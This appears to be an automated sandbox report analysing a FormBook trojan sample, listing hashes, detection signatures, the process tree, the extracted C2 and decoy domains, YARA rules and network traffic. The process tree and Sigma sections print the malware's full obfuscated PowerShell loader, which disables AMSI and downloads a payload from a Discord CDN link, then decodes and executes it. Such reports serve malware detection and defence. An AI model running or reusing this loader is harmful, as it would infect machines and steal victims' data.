Loading ...

Play interactive tourEdit tour

Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name:s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID:452684
MD5:f5041ec4ce468a07ecbfd076bc0f879b
SHA1:bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256:caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • s2rsXUiUn8.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\s2rsXUiUn8.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
    • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5116 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • calc.exe (PID: 5856 cmdline: {path} MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
        • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 4344 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.calc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.calc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.calc.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        9.2.calc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.calc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%Perma Link
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
          Source: 9.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.homekeycap.com/pjje/
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
